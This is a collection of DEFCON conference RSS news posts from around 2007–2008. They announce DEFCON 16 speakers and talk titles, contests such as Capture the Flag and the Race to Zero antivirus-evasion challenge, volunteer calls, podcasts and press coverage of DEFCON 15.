==> Final round of DEFCON 16 Speakers chosen!

https://www.defcon.org/defconrss.xml This is it, Ladies and Germs, the last few DEFCON 16 speakers have been chosen and the Talk schedule is now in it's final stages. Look for the DEFCON 16 Schedule page to be updated this week at https://www.defcon.org/html/defcon-16/dc-16-schedule.html. For now, check out the speaker page and see what these latest selections are all about! Grendel-Scan: A new web application scanning tool David Byrne, Eric Duprey Comparison of File Infection on Windows & Linux Iclee_vx Anti-RE Techniques in DRM Code Jan Newger How can I pwn thee? Let me count the ways Renderman Hijacking the Outdoor Digital Billboard Network Tottenkoph, Rev You can discuss the speakers and talks on the DEFCON Forums at: https://forum.defcon.org/showthread.php?t=9496

==> DEFCONBots is Back!

https://www.defcon.org/defconrss.xml DefconBots is back this year with the same rules as last year. Now is a great time to get started on your bot! Last year there were six competitors, this year let's get a lot more! Don't let "I can't solder" stop you again, you can get started with a simple kit available through http://defconbots.org There's even open source software to get you started in linux.

==> New DEFCON 16 Speakers Posted!

https://www.defcon.org/defconrss.xml 9 more talks have been added to the DEFCON 16 lineup, and are listed below, Alpha by Speaker Digital Security: a Risky Business Ian O. Angell Pen-Testing is Dead, Long Live the Pen Test Taylor Banks Hacking the Bionic Man Gadi Evron Panel: Internet Wars 2008 Gadi Evron Moderator The Big Picture: Digital Cinema Technology and Security Mike Renlund Inducing Momentary Faults Within Secure Smartcards / Microcontrollers Christopher Tarnovsky MetaPost-Exploitation Valsmith, Colin Ames Password Cracking on a Budget Matt Weir, Sudhir Aggarwal New ideas for old practices - Port-Scanning improved Fabian "fabs" Yamaguchi, FX

==> DEFCON 16 Artwork Contest Extended!

https://www.defcon.org/defconrss.xml Due to late blooming interest in the contest, all entries for the DEFCON 16 Artwork Contest will be accepted up until 5pm PST on Sunday June 22, 2008. You can find the rules at https://www.defcon.org/html/defcon-16/dc-16-artwork-contest.html. Voting for the People's Choice category will commence Monday June 23, 2008 and will run for one week on pics.defcon.org. A link to the voting gallery and instructions will follow at that time. You will need a DEFCON Pics account to vote, so if you don't have one, sign up now! Good luck all!

==> Defcon Goon: Speaker Operations: Call for Volunteers

https://www.defcon.org/defconrss.xml From Agent X on the DEFCON Forums: The few, the proud (arrogant?) ,the insane? Yes, that's right Speaker Operations a subset of the Defcon Goon Squad is looking for a few good folks. Speaker Operations goons are the blue shirts that ferry speakers to and from stage, keep the speaking schedule in order, and generally try to make the talks not suck... Sometimes we succeed, sometimes we fail, generally there is beer at the end. In an effort to ensure a healthy supply of goons for future Defcons, I'm holding semi-formal auditions/interviews this year at Defcon 16. So if you interested in joining the ranks of the Defcon Speaker Operations Goons squad, here's what you've got to do: * Write me an email, telling my why you will rock speaker operations. (In a good way). * Demonstrate your resourcefulness by tracking me down and arranging a time for us to talk at Defcon this year. Make it memorable...it's a busy con you know. * Demonstrate to the speaker operations staff those blue shirted goons again, you know why they are so awesome (?!Schwag, beer?!) Thank you for your interest. Agent X https://forum.defcon.org/showthread.php?t=9474

==> Open CTF Registration is now Open!

https://www.defcon.org/defconrss.xml Formerly known as Amateur Capture The Flag (aCTF), this contest pits any Defcon attendee against the house (DC949) as well as other contestants. There are a series of challenges of varying difficulty involving a variety of things, including cryptology, stenography, malicious software, and websites (and other services) just waiting to be exploited. Find out more at: http://dc949.org/oCTFIV/

==> Movie Night with the Dark Tangent

https://www.defcon.org/defconrss.xml This year on Friday night we will be screening a documentary, Hackers Are People Too, which will end before the director/producer needs to participate in Hacker Jeopardy. Then we will move on to some Blu-Ray goodness of "Appleseed Ex-Machina" for the latest in cg anime from Japan. Saturday evening we will go retro with "Three Days of the Condor", where you can see an early Robert Redford deal with spies, telephones, and intrigue. For those who have seen 'safehouse' you'll recognize a scene for scene rip off homage to "Condor" Then we'll close with as of yet TBD movie...

==> Qualifying CTF Teams for DEFCON 16

https://www.defcon.org/defconrss.xml The following teams have demonstrated their uber prowess by qualifying to participate in the DEFCON 16 Capture the Flag Contest, organized by Kenshoto. These 7 teams will be battling last year's winners, 1@stPlace, for the CTF title! DEFCON would like to congratulate all of these talented teams and wish them luck! Routards 5200 Trivia 1500 Binary Leetness 1000 Forensics 1500 Real World 600 Potent Pwnables 600 Pandas with Gambas 5200 Trivia 1500 Binary Leetness 1000 Forensics 1500 Potent Pwnables 600 Real World 600 Guard@MyLan0 4800 Trivia 1500 Binary Leetness 600 Forensics 1500 Potent Pwnables 600 Real World 600 Shellphish 4800 Trivia 1500 Binary Leetness 600 Forensics 1500 Potent Pwnables 600 Real World 600 Taekwon-V 4800 Trivia 1500 Binary Leetness 600 Forensics 1500 Potent Pwnables 600 Real World 600 WOWHACKER 4800 Trivia 1500 Binary Leetness 600 Forensics 1500 Potent Pwnables 600 Real World 600 PLUS 4800 Trivia 1500 Binary Leetness 600 Forensics 1500 Potent Pwnables 600 Real World 600

==> Mystery Challenge Registration Closing Soon!

https://www.defcon.org/defconrss.xml The LosT@Con Mystery Challenge preregistration will remain open for an undisclosed bit longer. Teams who have not completed the preregistration but that intend to enter are encouraged to post such intentions in the DC forums. This year there will be one wildcard slot open, and a mini-contest will be held two hours prior to the official contest start for that slot. https://forum.defcon.org/forumdisplay.php?f=369

==> Sign up for Hacker Jeopardy and Buzzword Survivor!

https://www.defcon.org/defconrss.xml Hacker Jeopardy The Official Hacker Jeopardy entry thread on the DEFCON Forums is now open for signup, at https://forum.defcon.org/showthread.php?t=9444 From the signup thread: This year, we will be accepting applications from both teams and individuals. We will likely hold a set of qualifying games Friday afternoon to allow unproven teams/people a chance to show off their skillz and advance into the late night tournament. Buzzword Survivor - NEW! Buzzword Survivor is a new contest that pits you against 36 hours of vendor pitches, with big cash prizes! Find out what it's all about and sign up at https://forum.defcon.org/forumdisplay.php?f=352

==> DEFCON 16 Artwork Contest Reminder

https://www.defcon.org/defconrss.xml There's only a little over a week left to submit your creations for the DEFCON 16 Artwork Contest. The Contest info and rules can be found at https://www.defcon.org/html/defcon-16/dc-16-artwork-contest.html. Current submissions are on https://pics.defcon.org/showgallery.php?cat=532&ppuser=16770

==> Another Round of DEFCON 16 Speakers are Live!

https://www.defcon.org/defconrss.xml We've got more talks up on the speaker page, listed below, alpha by speaker BackTrack Foo - From bug to 0day Mati Aharoni They're Hacking Our Clients! Introducing Free Client-side Intrusion Prevention Jay Beale Arbitrary code injecting MITM attack vectors Joachim De Zutter "byterage" Wide World WAF's Ben Feinstein Virtually Hacking John Fitzpatrick Malware RCE: Debuggers and Decryptor Development Michael Ligh Fear, Uncertainty and the Digital Armageddon Morgan Marquise-Boire Toasterkit, a Modular NetBSD Rootkit Anthony Martinez, Thomas Bowen Bringing Sexy Back: Breaking in with Style David Maynor, Robert Graham Panel: All Your Sploits (and Servers) Are Belong To Us: Vulnerabilities Don't Matter (And Neither Does Your Security) David Mortman, Rich Mogull, Chris Hoff, Robert "RSnake" Hansen, Robert Graham, David Maynor Solid Stated Drives Destroy Forensic & Data Recovery Jobs: Animated! Scott Moulton Urban Exploration - A Hacker's View Phreakmonkey Beholder: New wifi monitor tool Nelson Murilo, Luiz 'effffn' Eduardo Keeping Secret Secrets Secret and Sharing Secret Secrets Secretly Vic Vandal RE:Trace: The Reverse Engineer's Unexpected Swiss Army Knife David Weston, Tiller Beauchamp https://www.defcon.org/html/defcon-16/dc-16-speakers.html

==> Gringo Warrior at DEFCON 16 NEW!

https://www.defcon.org/defconrss.xml Participants in Gringo Warrior will have five minutes to free themselves from handcuffs, escape from their "cell", get past a guard, retrieve their passport from a locked filing cabinet, leave through another locked door, and make their escape to freedom. The course will offer a variety of locks representing a range of difficulty, allowing participation by people of all skill levels. Points will be awarded based on the time of completion as well as the difficulty of locks attempted. The best warrior of all wins the grand prize! Get the full story at: https://forum.defcon.org/showthread.php?t=9401

==> DEFCON 16 now has a Twitter Feed!

https://www.defcon.org/defconrss.xml DEFCON 16 Now has a Twitter Feed for all you Tweeters out there! Frequent updates will be forthcoming up to and during the con to keep you in the loop for news, contest updates and events. http://www.twitter.com/defcon16

==> DEFCON 16 CTF Quals Complete

https://www.defcon.org/defconrss.xml From Kenshoto.com: See the final results at http://www.kenshoto.com/results.txt! The first 7 teams on the list have qualified. If any are unable to attend, invitations will be extended to the alternates in scoring order.

==> DEFCON 16 Slogan Contest Now Open

https://www.defcon.org/defconrss.xml Do you think you have the wordsmithing skills to come up with he next great DEFCON slogan? The DEFCON 16 Slogan Contest is now up and running, so get on over to http://www.totallybog.us/dc16slogan/dc16slogan.html and submit your literary gems for a chance to be featured in the DEFCON 16 Program!

==> More DEFCON 16 Speakers Online!

https://www.defcon.org/defconrss.xml Working with Law Enforcement Don M. Blumenthal CSRF Bouncing Michael Brooks Hacking Desire Ian Clark Compromising Windows Based Internet Kiosks Paul Craig Shifting the Focus of WiFi Security: Beyond cracking your neighbor's wep key Thomas d'Otreppe de Bouvette "Mister_X", Rick Farina "Zero_Chaos" Snort Plug-in Development: Teaching an Old Pig New Tricks Ben Feinstein Playing with Web Application Firewalls Wendel Guglielmetti Henrique Advanced Software Armoring and Polymorphic Kung Fu Nick Harbour Under the iHood Cameron Hotchkies Tuning Your Brain. Lyn Forensics is ONLY for Private Investigators Scott Moulton Every Breath You Take Jim O'Leary Advanced Physical Attacks: Going Beyond Social Engineering and Dumpster Diving, Or, Techniques of Industrial Espionage Eric Schmiedl Gaming - The Next Overlooked Security Hole Ferdinand Schober Making a Text Adventure Documentary Jason Scott StegoFS James Shewmaker Let's Sink the Phishermen's Boat! Teo Sze Siong, Hirosh Joseph Medical Identity Theft Eric Smith, Dr. Shana Dardan Web Privacy and Flash Local Shared Objects Clinton Wong

==> Beverage Cooling Contraption Contest on Hack A Day!

https://www.defcon.org/defconrss.xml The BCCC run by Deviant Ollam has popped up on hackaday.com! From the article: Let's face it: no one likes warm beer. In the arid August air of Las Vegas, though, it's difficult to get anything else. To combat this problem, Deviant has hosted a competition the last three years at Defcon called the Beverage Cooling Contraption Contest, or BCCC. We're not talking about something as simple as a Coleman cooler or even a peltier cooler: the devices entered in this contest have to be able to take a beer from hot to cool and your glass within minutes. For info on the contest, go to: http://www.deviating.net/bccc

==> Round two of DEFCON 16 speaker selections!

https://www.defcon.org/defconrss.xml The selection process continues, and the second batch of talks for DEFCON 16 is now on the the speaker page. They are listed below, alpha by speaker! Check 'em out! Autoimmunity disorder in Wireless LAN Md Sohail Ahmad, JVR Murthy, Amit Vartak The Anatomy of a Subway Hack: Breaking Crypto RFID's and Magstripes of Ticketing Systems Zack Anderson, RJ Ryan, Alessandro Chiesa Predictable RNG in the vulnerable Debian OpenSSL package, the What and the How Luciano Bello, Maximiliano Betacchini Buying Time- What is your Data Worth? (A generalized Solution to distributed Brute Force attacks) Adam Bregenzer ModScan: A SCADA MODBUS Network Scanner Mark Bristow Deciphering Captcha Michael Brooks Hacking Data Retention: Small Sister your digital privacy self defense Brenno De Winter Markets for Malware: A structural Economic Approach Brian K. Edwards, Silvio J. Flaim Identification Card Security: Past, Present, Future Doug Farre VLANs Layer 2 Attacks: Their Relevance and their Kryptonite Kevin Figueroa, Marco Figueroa, Anthony L. Williams Journey to the center of the HP28 Travis Goodspeed Nail the Coffin Shut, NTLM is Dead Kurt Grutzmacher Race-2-Zero Unpacked Simon Howard Triad-Based Music Steganography Adrian Johnson Panel: Black vs. White: The complete life cycle of a real world breach David Kennedy, Ken Stasiak, Scott White, John Melvin, Andrew Weidenhamer Demonstration of Hardware Trojans Fouad Kiamilev, Ryan Hoover WhiteSpace: A Different Approach to JavaScript Obfuscation Kolisar Flux on: EAS (Emergency Alert System) Matt "DCFLuX" Krick Taking Back your Cellphone Alexander Lash Feed my Sat Monkey Major Malfunction Sniffing Cable Modems Guy Martin The World of Pager Sniffing/Interception: More Activity than one may suspect NYCMIKE New Tool for SQL Injection with DNS Exfiltration Robert Ricks Free Anonymous Internet Using Modified Cable Modems Blake Self, Durandal Evade IDS/IPS Systems using Geospatial Threat Detection Ryan Trost The Death Envelope: A Medieval Solution to a 21st Century Problem Matt Yoder

==> First round of DEFCON 16 speakers selected!

https://www.defcon.org/defconrss.xml The first round of speakers have been selected for DEFCON 16, and it looks like we have a great lineup going! The selection process is coming along nicely and we should have the next batch of speakers online by the middle of next week. Here are the titles and speakers for the talks so far, alpha by speaker: Time-Based Blind SQL Injection using heavy queries: A practical approach for MS SQL Server, MS Access, Oracle and MySQL databases and Marathon Tool Chema Alonso, Jos Parada VulnCatcher: Fun with Vtrace and Programmatic Debugging atlas Owning the Users with Agent in the Middle Jay Beale The emergence (and use) of Open Source Warfare Peter Berghammer What To Do When Your Data Winds Up Where It Shouldn't Don Blumenthal Generic, Decentralized, Unstoppable Anonymity: The Phantom Protocol Magnus Brding Bypassing pre-boot authentication passwords by instrumenting the BIOS keyboard buffer (practical low level attacks against x86 pre-boot authentication software) Jonanthan Brossard Building a Real Session Layer D.J. Capelis Hacking E.S.P. Joe Cicero, Michael Vieau Climbing Everest: An Insider's Look at one state's Voting Systems Sandy Clark "Mouse" Could Googling Take Down a President, a Prime Minister, or an Average Citizen? Greg Conti Next Generation Collaborative Reversing with Ida Pro and CollabREate Chris Eagle, Tim Vidas Ask EFF: The Year in Digital Civil Liberties Panel Kevin Bankston, Eva Galperin, Jennifer Granick, Marcia Hofmann, Corynne McSherry, Kurt Opsahl Panel: Hacking in the Name of Science Tadayoshi Kohno, Jon Callas, Alexei Czeskis, Dan Halperin, Karl Koscher de-Tor-iorate Anonymity Nathan Evans, Christian Grothoff Nmap: Scanning the Internet Fyodor BSODomizer Joe "Kingpin" Grand, Zoz Satan is on my Friends list: Attacking Social Networks Nathan Hamiel, Shawn Moyer A Hacker Looks at 50 G. Mark Hardy War Ballooning-Kismet Wireless "Eye in the Sky" Rick Hill The Death of Cash: The loss of anonymity and other dangers of the cash free society Tony Howlett Intercepting Mobile Phone/GSM Traffic David Hulton, "Skyper" Ham For Hackers - Take Back the Airwaves JonM Career Mythbusters: Separating Fact from Fiction in your Information Security Career Lee Kushner, Mike Murray Developments in Cisco IOS Forensics "FX" Felix Lindner Good Viruses. Evaluating the Risks Dr. Igor Muttik Brain Games: Make your own Biofeedback Video Game Ne0nRain Joe "Kingpin" Grand VoIPER: Smashing the VoIP stack while you sleep N.N.P. Hacking OpenVMS Christer berg, Claes Nyberg, James Tusini 365-Day: Active Https Cookie Hijacking Mike Perry Malware Detection through Network Flow Analysis Bruce Potter The true story of the Radioactive Boyscout: The first nuclear hacker and how his work relates to Homeland Security's model of the dirty bomb Paul F. Renda CAPTCHAs: Are they really hopeless? (Yes) Mike Spindel, Scott Torborg Living in the RIA World Alex Stamos, David Thiel, Justine Osborne Xploiting Google Gadgets: Gmalware and Beyond Tom "strace" Stracener, Robert "Rsnake" Hansen TBA Marc Weber Tobias How to make Friends & Influence Lock Manufacturers Schuyler Towne, Jon King Compliance: The Enterprise Vulnerability Roadmap Weasel Mobile Hacker Space Thomas Wilhelm To read more about these talks, go to the speaker page at http://www.defcon.org/html/defcon-16/dc-16-speakers.html!

==> First Submissions in for DEFCON 16 Artwork Contest

https://www.defcon.org/defconrss.xml You can check out the first few submissions to the Artwork Contest on pics.defcon.org at this URL: https://pics.defcon.org/showgallery.php?cat=532

==> Call for Papers Closed/Speaker Selection has begun!

https://www.defcon.org/defconrss.xml The time has come to close the DEFCON 16 CFP. Speaker Selection is now underway, and updates to the Speaker list will be frequent as they are chosen. Keep your eyes on the speaker page, the schedule page, and subscribe to the RSS Feed to stay apprised of speaker announcements as they occur! Speaker Page: https://www.defcon.org/html/defcon-16/dc-16-speakers.html Schedule Page: https://www.defcon.org/html/defcon-16/dc-16-schedule.html RSS Feed: https://www.defcon.org/html/defcon-16/dc-16-speakers.html

==> DEFCON 16 CFP Open through the weekend!

https://www.defcon.org/defconrss.xml For all you last minute stragglers and super busy folks, we are keeping the Call for Papers open through Monday the 19th. Get on it and send that submission to talks at defcon dot org! https://www.defcon.org/html/defcon-16/dc-16-cfp-form.html

==> Mystery Challenge Registration Challenge Open!

https://www.defcon.org/defconrss.xml LosT is working his devious magic again with the LosT @ Con Mystery Challenge! There is a Pre-Reg Challenge currently open, and you can find instructions at https://forum.defcon.org/showthread.php?t=9357. What is the Mystery Challenge you may ask...? From mysterychallenge.org The mystery challenge is just that- a mystery. Details of the contest are not given until the contest starts. So take the dare, and enter a contest where you are flying blind. So you heard about the challenge, and think you can compete? Search for hints and clues carefully, even prior to Defcon. Suggested Skillset for success: -Physical security (Lockpicking, literal hacking, etc) -Electronics (reading schematics, breadboard prototyping, etc) -Puzzle and Riddle Skills -Coding, networking, hacking... -???

==> Call for Papers Closing Soon

https://www.defcon.org/defconrss.xml You've only got a few days left to submit your groundbreaking research to the DEFCON Call for Papers. Go to https://www.defcon.org/html/defcon-16/dc-16-cfp-form.html and get your submission in for the chance to give a talk at DEFCON 16!

==> DEFCON 16 Capture the Flag Qualification Announcement

https://www.defcon.org/defconrss.xml Kenshoto will be back this year bringing all out cyber-warfare to DEFCON 16. The qualification round for this year's Capture the Flag contest has been officially announced. From the DEFCON Forums: Deputy Director of Homeland Security, Dr. Kenneth Shoto today announces a call to cyber-ninjas everywhere to sign up for his annual fight-to-the-death qualifying competition for the Defcon Capture the Flag (CtF) contest. The qualifying competition will start at 10PM on Friday, May 30th and end at 10PM on Sunday, June 1st. Find out more at https://forum.defcon.org/showthread.php?t=9352 or http://kenshoto.allyourboxarebelongto.us:1337/

==> Race to Zero and Dan Kaminsky on CBC Radio

https://www.defcon.org/defconrss.xml The buzz concerning the new unofficial Race to Zero Contest at DEFCON 16 just keeps on building. Dan Kaminsky provides his thoughts on the mounting controversy in an interview with Search Engine, a Canadian public radio program. Check it out here:http://podcast.cbc.ca/mp3/searchengine_20080508_5692.mp3

==> pics.defcon.org is Back!

https://www.defcon.org/defconrss.xml After a hiatus due to an XSS vulnerablity, The DEFCON pics site is back up and running! Don't hesitate to head on over and upload your favorite photos and videos from past DEFCON conventions!

==> Race to Zero Makes Headlines

https://www.defcon.org/defconrss.xml The Race-to-Zero anti-virus challenge was announce scarcely a week ago, and already the controversy surrounding it has bubbled all the way up to Wired. The contest's basic premise is that competitors will be given sample virus code and rewarded for modifying that code in such a way that it defeats common AV products. AV vendors have made their discomfort with the idea clear, with various spokesmen for the industry voicing concern about the creation of new threats to existing AV products. Contest organizers have countered that the contest is categorically not about creating new virii, rather it is about demonstrating the speed with which currently blocked virii can be modified to defeat current virus-blocking software. While it's important to note that while the contest will be happening at this year's DEFCON, it is not an official DEFCON contest. To learn about the contest from its creators and organizers, please check their website at www.racetozero.net. Links: http://www.racetozero.net/ http://blog.wired.com/27bstroke6/2008/04/hacker-challenge.html http://www.infoworld.com/article/08/04/28/Security-vendors-slam-Defcon-virus-contest_1.html Go to https://forum.defcon.org/forumdisplay.php?f=419 to chime in on the controversy

==> DEFCON 16 Artwork Contest Call for Submissions

https://www.defcon.org/defconrss.xml Whip out your favorite medium and get to creating, because the official DEFCON 16 Art Contest is now underway! This years contest is a bit different from previous years, and will run now to June 15, 2008. Go to http://www.defcon.org/html/defcon-16/dc-16-artwork-contest.html

==> New Contest! The Race to Zero

https://www.defcon.org/defconrss.xml Check out this new contest brewing for DEFCON 16! From the DEFCON Forums: The Race to Zero involves contestants being given a sample set of viruses and malcode to modify and upload through the contest portal. The portal passes the modified samples through a number of antivirus engines and determines if the sample is a known threat. The first team or individual to pass their sample past all antivirus engines undetected wins that round. Each round increases in complexity as the contest progresses. Further details are available here: http://www.racetozero.net/

==> DEFCON 16 Black & White Ball Call for Talent

https://www.defcon.org/defconrss.xml This is the Official CALL FOR TALENT : This year the ballroom will lead a double life . By day: the room will be a chillout/break out room complete with wifi By night: the room will transform into the black and white ball complete with dance floor, lights,headlining acts and a bar. This said we are currently taking all submissions for DJ/acts for the chillout/breakout . and have a few slots for black and white ball . some of the styles we are looking for are : drum n bass trance breaks electro industrial If you are interested in performing please contact : blackandwhitedjs@gmail.com

==> DEFCON 16 Call for Papers Now Open!

https://www.defcon.org/defconrss.xml That's right! It's time again to submit your hacktastic discoveries to be considered as a DEFCON 16 talk! New and interesting research is always welcomed in the realm of security, hardware hacking, social engineering, lockpicking, and anything else you can modify, bypass or reverse engineer. Out of the box thinking is what we're after... Go to the CFP form and submit!.

==> DEFCON 15 [Video] Podcast now online.

https://www.defcon.org/defconrss.xml The Defcon 15 Video Podcast is now online. If you didn't make it, or missed the speaker you wanted to see here is your chance to download and watch the presentations any time. http://www.defcon.org/podcast/defcon-15-video.rss Supporting Materials will be online at: https://www.defcon.org/html/links/defcon-media-archives.html#dc_15

==> DEFCON 15 [Audio] Podcast now online

https://www.defcon.org/defconrss.xml The Defcon 15 Audio Podcast is now online. If you didn't make it, or missed the speaker you wanted to see here is your chance to download and hear the presentations when you want. http://www.defcon.org/podcast/defcon-15-audio.rss Supporting Materials will be online at: https://www.defcon.org/html/links/defcon-media-archives.html#dc_15

==> Tiger Team with Pyr0, long time DEF CON Goon(tm)

https://www.defcon.org/defconrss.xml Tiger Team is a new series on TruTV (formerly CourtTV) featuring a familiar face from DEFCON, Luke McOmie aka pyr0. From wikipedia: The show follows a "tiger team" of Chris Nickerson, Luke McOmie, and Ryan Jones, which is hired to infiltrate organizations with the objective of testing their weaknesses to electronic, psychological, tactical, and physical threats. Attacks executed on organizations in this television show include social engineering, wired and wireless hacking, and physically breaking into buildings. The television show's first two episodes aired Tuesday, December 25, 2007 at 11:00 pm ET and 11:30 pm ET. The first episode is available on TruTV's website in streaming flash format. TruTV Feedback: http://www.trutv.com/contact/feedbackform.asp?amp;subject_id=148&start=true

==> Join the DEFCON LinkedIn Group

https://www.defcon.org/defconrss.xml Join the DEFCON LinkedIn Group! We have created a DEF CON group on LinkedIN, if you already have an account at LinkedIN please join us. We don't collect email addresses so there is no easy way to pre-approve people, just use the following link to request membership. http://www.linkedin.com/e/gis/47798/109B061719DC

==> Pre-DEFCON 16

https://www.defcon.org/defconrss.xml It's beginning already... Check out the Pre-DEFCON 16 Discussions in the DEFCON Forums. If you want to get involved, start here!

==> DT Speaks Out On the "To Catch a Hacker" Scandal

https://www.defcon.org/defconrss.xml The media storm that followed the NBC producer fleeing DEFCON included a lot of opinions, but none of them came from the DEFCON staff itself. DT recently contributed a piece to the Thinkernet blog at InternetEvolution.com. It's an interesting piece about the significance of the event and some of the lessons that the media can take from all the hoopla.

==> DEFCON FORUMS now support user blogs

https://www.defcon.org/defconrss.xml The DEFCON foums (forum.defcon.org) now supports projects and blogs. We have licensed the blog http://www.vbulletin.com/features_blog.php, tool, and anyone with a forum account can now create a blog. We'll be doing more with this in the future, but for now we are encouraging people to create accounts and play with it. If it works we'll keep it, if not we'll look for other software to try. We've also licensed Project Tools (http://www.vbulletin.com/features_project.php) that everyone can use to plan DC Groups projects, events at the con, or their latest hacking project. If you're a forum member, we hope you'll take a little time to try out the new features. If you're not, here's hoping this helps you decide to join us.

==> DEFCON 15 Badge finalist in Design Challenge

https://www.defcon.org/defconrss.xml The Defcon 15 badge is a finalist in the Freescale Semiconductor Black Widow $10,000 Design Challenge. Freescale selected the ten finalists from a field of more than 775 participants. Each submission was judged on creativity, design efficiency, technical complexity, number of Freescale devices used, and overall application innovation and usefulness.

==> Photos of DC 15 Badge Hacks

https://www.defcon.org/defconrss.xml Check out these photos of the badge hacking and final hacks at DEFCON 15. For badge source code, video of the hacks, and source of selected hacks, check out Joe Grand's badge page at: http://www.grandideastudio.com/portfolio/index.php?amp;id=1&prod=54

==> DEFCON Network Survival Guide

https://www.defcon.org/defconrss.xml It's a little late, but it's never to early to start planning for next year. If you must get online at DEFCON, here's a little guide to help keep you from getting completely owned. >From The Register: "..Defcon, the most bacchanal of security conferences and perhaps the single largest gathering of technically adept pranksters. Now is the perfect time to map out a strategy for keeping emails private and making sure your system doesn't get ransacked by the scowling kid with the nose ring and jet-black hair."

==> The Traveling Terabyte Project

https://www.defcon.org/defconrss.xml Many of you know Deviant Ollam, from his extensive involvement in the Lockpick Village and his running of the Beverage Cooling Contest, as well as his new "Titanium Chef" and "guess the Flesh" contests at the Toxic BBQ this year. We came across a story about one of his projects and though we'd share. >From tgdaily.com: A New Jersey network engineer is on a mission to send some love and care of the digital kind to Americans stationed overseas. Going by his hacker handle Deviant Ollam, hes been sending out hard drives filled with popular movies, television shows and music for over a year. Dubbed the Traveling Terabyte Project (TTB), the drives have seen action in war-torn countries and one set is now making a small contingent of Marines very happy in the former Soviet republic of Tajikistan. Photos at: http://www.tgdaily.com/index.php?option=com_content&task=blogsection&id=18&Itemid=41&slideshow=20070920

==> Kingpin: far from soft, reprezentin' l0pht.

https://www.defcon.org/defconrss.xml This little slice of gangsta was part of the winning Badge Hacking Contest submission by Team Osogato. This rap song was created by The Brothers Grimm and based on Kingpin's "Ode to the DEFCON 15 Badge" poem printed in the conference program. Played at the DEFCON 15 Awards Ceremony on Sunday afternoon. Thanks to Kingpin for posting this on the media server at pics.defcon.org. If you've got any pictures or media from DEFCON, please consider sharing it with the DC family at pics.defcon.org.

==> DEFCONbot video

https://www.defcon.org/defconrss.xml Ever wonder what it takes to compete in the DEFCONbot shootout? Check out some fascinating behind-the-scenes video from a team that had a sentry gun in this year's competition at the Burnt Popcorn blog. For more information about DC 15's DEFCONbots winners or data on past competitions, be sure to visit defconbots.org.

==> Call for DEFCON 15 photos

https://www.defcon.org/defconrss.xml If you have pictures of this DEFCON 15 (or any previous DEFCON) you'd like to share, please upload them to https://pics.defcon.org We're trying to create a visual record of all the shows and your help is appreciated. Just create an account and start uploading pictures and videos!

==> DEFCON media archives updated

https://www.defcon.org/defconrss.xml The DEFCON media archives have been updated with slides, white papers and extras for DEFCON 15 presentations. Come check them out, and stay tuned - we'll be adding audio and video from DEFCON 15 as soon as it's ready.

==> DEFCON In The News

https://www.defcon.org/defconrss.xml Many interesting things happened at this year's DEFCON, from the sensational hackable badge by Joe Grand to the eye-opening talk by Zac Franken on access control reader (in)security. We blew the undercover reporter's cover, and we found out that a kid can bump a "bump-proof" deadbolt. We even married two Feds. What a year! Here are just a few of the headlines arising from DEFCON 15: http://www.wired.com/politics/security/news/2007/08/medeco Medeco Readies Assembly-Line Fix for DefCon Lock Hack http://www.computerworld.com/action/article.do command=viewArticleBasic&articleId=9029080 $10 hack can unlock nearly any office door http://blog.wired.com/27bstroke6/2007/08/i-married-a-fed.html I Married a Fed at DefCon http://www.youtube.com/watch?v=nCvmkxO5hoQ Michelle Madigan Video: Dateline Reporter Uncovered At DEFCON 2007. http://weblog.infoworld.com/zeroday/archives/2007/08/defcon_diary_th.html Defcon diary: The real story

==> A Word from DEFCON 15 Badge Creator Joe Grand!

https://www.defcon.org/defconrss.xml Joe Decided to drop us a line and clue send us some info on whats going on with the badges AFTER the con. We loved the badges this year and apparently we arent the only ones who found them awesome. >From Joe Grand "You've probably noticed that people are still going *nuts* over the badges. That's a really awesome feeling and hopefully there will be some of the 40 people who took components and development kits coming back next year with some radical hacks. Here are some pictures I took of the Black Hat and DEFCON conferences (and badge hacking): http://www.flickr.com/photos/joesmooth/sets/72157601295119952/ and here: http://www.flickr.com/photos/joesmooth/sets/72157601302838516/ The badges have been selling like hot cakes on eBay: http://search.ebay.com/defcon-15 Take a look at the completed listings, too, to see the high bidders! Also, there were TONS of blog and news reports about the badge. You've probably read most of them, but here are the ones I liked the best: * Hack-a-Day, August 2, 2007, http://www.hackaday.com/2007/08/02/the-defcon-badge * The Register, The romance and mystery of a good hack, August 6, 2007, http://www.theregister.co.uk/2007/08/06/defcon_final/ * The Inquirer, Defcon ID badge comes with its own technical manual, August 3, 2007 http://www.theinquirer.net/default.aspx?article=41436 * boingboing, Defcon's hackable badges, August 3, 2007, http://www.boingboing.net/2007/08/03/defcons_hackable_bad.html * Wired, Threat Level, Badge Hack at DefCon, August 3, 2007 http://blog.wired.com/27bstroke6/2007/08/badge-hack-at-d.html * Makezine.com: Defcon 15 round up, August 5, 2007, http://www.makezine.com/blog/archive/2007/08/defcon_15_round_up.html * Makezine.com: Hackers on a Plane - Defcon, August 7, 2007, Http://www.makezine.com/blog/archive/2007/08/hackers_on_a_plane_defcon_1.html * Gizmodo, DefCon Badge Hacked in 10 Minutes, August 3, 2007, http://gizmodo.com/gadgets/defcon/defcon-badge-hacked-in-10-minutes-285998.php I'll be putting up a webpage with complete badge development info, badge hacking contest results/hacks/source, etc. in the next week or so. It will be directly accessible from the main www.grandideastudio.com site for a while. Details on the winning badge hacking contest entry from Team Osogato can be found here: http://www.osogato.com/hacks This was the only entry out of seven that combined hardware and firmware modifications - they hacked the badge into a line-level meter for under $10 that used the LED matrix to display the peak audio levels of an audio signal fed into one channel of the A/D. The two capacitive touch buttons are used to adjust the input levels of the signal and there are even three shades of "greyscale" for a fading effect on the LEDs. For the icing on the cake, the team worked with The Brothers Grimm from Michigan (http://www.myspace.com/CompleteError) to create a rap song based on my poem that I wrote for the DC15 program (on page 3). What an honor! The song is freely available at the Team Osogato link above and step-by-step hack details are forthcoming. Hope you guys are recovering! Joe"

==> DEFCON 15 Supports EFF! Dunk Tank Results!

